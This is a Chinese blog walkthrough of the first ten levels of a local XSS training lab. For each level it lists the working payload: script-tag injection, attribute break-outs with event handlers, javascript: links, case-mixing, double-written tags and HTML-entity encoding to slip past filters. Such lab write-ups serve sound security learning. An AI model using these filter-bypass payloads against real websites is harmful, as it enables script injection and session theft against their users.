当前位置:   article > 正文

小白简述XSS靶机(一)_xss top-csdn

xss top-csdn

配置环境

虚拟机:Windows7–>IP:192.168.50.248
工具:phpstudy5.4.45
浏览器:火狐渗透版
靶场:

链接:链接:https://pan.baidu.com/s/1l1T1K0QyJrnv22vabC6pRw 
提取码:t6z4 
  • 1
  • 2

第一关

在这里插入图片描述
先输入XSS的代码

<script>alert(1);</script>
  • 1

在这里插入图片描述
直接弹窗了,第一关没啥难度

第二关

还是一样,先输入代码

<script>alert(1);</script>
  • 1

在这里插入图片描述
发现输入的代码打印出来了,按F12查看一下,发现value属性没有加过滤,直接闭合
在这里插入图片描述

输入代码

"><script>alert(1);</script>
  • 1

在这里插入图片描述

第三关

直接输入

"><script>alert(1);</script>
  • 1

在这里插入图片描述
发现输入的也是直接打印出来了,还是按F12查看一下,发现尖括号被转义了
在这里插入图片描述
重新构造pyload,鼠标在搜索框里过一下

' onmousemove='javascript:alert(1)
  • 1

在这里插入图片描述

第四关

直接输入上关的代码
在这里插入图片描述
输入的被打印出来,按F12查看,发现单引号未闭合
在这里插入图片描述
改换成双引号,鼠标移动到搜索框

" onmousemove="javascript:alert(1)
  • 1

在这里插入图片描述

第五关

使用上关的代码
在这里插入图片描述
输入的被打印出来的,按F12查看,ON被过滤了
在这里插入图片描述

使用html的标签过,并点击搜索框旁边的尖括号

"> <a href='javascript:alert(1)'>
  • 1

在这里插入图片描述

第六关

使用上关的代码
在这里插入图片描述
输入的被打印出来的,按F12查看,href被过滤了
在这里插入图片描述
使用大小写绕过

"><ScRiPt>alert(1)</ScRIpT>
  • 1

在这里插入图片描述

第七关

使用上关的代码
在这里插入图片描述
输入的被打印出来的,按F12查看,script被过滤了
在这里插入图片描述
使用双写来绕过

"> <scrscriptipt>alert(1)</scrscriptipt>
  • 1

在这里插入图片描述

第八关

使用上关的代码
在这里插入图片描述
发现输入的并点击友情链接都给打印出来了,按F12查看,发现是汉字
在这里插入图片描述

那么HTML实体编码并点击友情链接

javascript:alert(1)
&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;
  • 1
  • 2

在这里插入图片描述

第九关

使用上关的代码
在这里插入图片描述
提示连接不合法,那么重新构造一下

javascrip&#x74;:alert(1)//http://www.baidu.com
  • 1

在这里插入图片描述

第十关

输入"><script>alert(1);</script>
在这里插入图片描述

输入的打印出来了,按F12查看
在这里插入图片描述
发现t_sort可以使用,构造pyload,并点击搜索框

t_sort=" onclick=alert(1) type="text"
  • 1

在这里插入图片描述

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop】
推荐阅读
相关标签
  

闽ICP备14008679号